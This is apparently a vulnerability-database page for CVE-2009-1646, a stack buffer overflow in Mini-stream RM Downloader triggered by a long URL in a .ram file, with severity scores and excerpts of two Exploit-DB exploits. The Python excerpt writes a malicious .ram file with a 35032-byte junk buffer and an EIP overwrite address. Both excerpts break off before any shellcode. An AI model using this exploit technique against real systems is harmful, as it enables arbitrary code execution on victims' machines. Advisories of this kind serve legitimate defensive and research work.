CVE-2009-1646
published 2009-05-15CVE-2009-1646: Stack-based buffer overflow in Mini-stream RM Downloader 3.0.0.9 allows remote attackers to execute arbitrary code via a long rtsp URL in a .ram file.
PriorityP343critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.06%
91.2th percentile
Stack-based buffer overflow in Mini-stream RM Downloader 3.0.0.9 allows remote attackers to execute arbitrary code via a long rtsp URL in a .ram file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | mini-stream_rm_downloader | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
RM Downloader 2.7.5.400 - Local Buffer Overflow
exploitdb·2015-03-26
CVE-2009-1646 RM Downloader 2.7.5.400 - Local Buffer Overflow
RM Downloader 2.7.5.400 - Local Buffer Overflow
---
#!/usr/bin/env python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Related Vulnerability/ies:
# http://www.exploit-db.com/exploits/8628/
#POC:
#IMG1:
#http://i.imgur.com/87sXIj8.png
from struct import pack
file="crack.ram"
junk="\x41"*35032
eip=pack('<I',0x7C9D30D7)
junk2="\x44"*4
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
#ht
Exploit-DB
RM Downloader 3.0.0.9 - '.RAM' Local Buffer Overflow
exploitdb·2009-05-07
CVE-2009-1646 RM Downloader 3.0.0.9 - '.RAM' Local Buffer Overflow
RM Downloader 3.0.0.9 - '.RAM' Local Buffer Overflow
---
#!/usr/bin/perl
=gnk
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\...From Iran
RM Downloader 3.0.0.9 (.RAM) Local Buffer Overflow Exploit
[»] Script:.............[ RM Downloader 3.0.0.9 ].......................
[»] Website:............[ http://mini-stream.net/ ].....................
[»] Today:..............[ 07052009 ]....................................
[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
[x] tested on "Windows XP SP2"... [
No writeups or analysis indexed.
2009-05-15
Published